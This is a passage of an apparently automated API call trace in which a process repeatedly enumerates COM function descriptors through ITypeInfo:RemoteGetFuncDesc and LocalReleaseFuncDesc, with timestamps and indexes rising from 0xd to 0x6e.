ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xf, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x10, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x11, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x12, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x13, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x14, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x15, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x16, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x17, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x18, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x19, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.295] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x1f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.295] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x20, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x21, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x22, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x23, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x24, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x25, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x26, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x27, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x28, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x29, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.296] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x2f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x30, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x31, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x32, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x33, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x34, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x35, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x36, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x37, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x38, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x39, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x40, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x41, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.297] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x42, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x43, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x44, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x45, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x46, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x47, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x48, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x49, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x50, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x51, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x52, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x53, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x54, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x55, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.298] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x56, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x57, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x58, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x59, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x60, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x61, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x62, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x63, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x64, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x65, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x66, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x67, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x68, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.299] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x69, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc 